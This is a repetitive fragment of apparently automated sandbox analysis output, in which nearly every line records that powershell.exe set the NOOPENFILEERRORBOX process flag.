                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
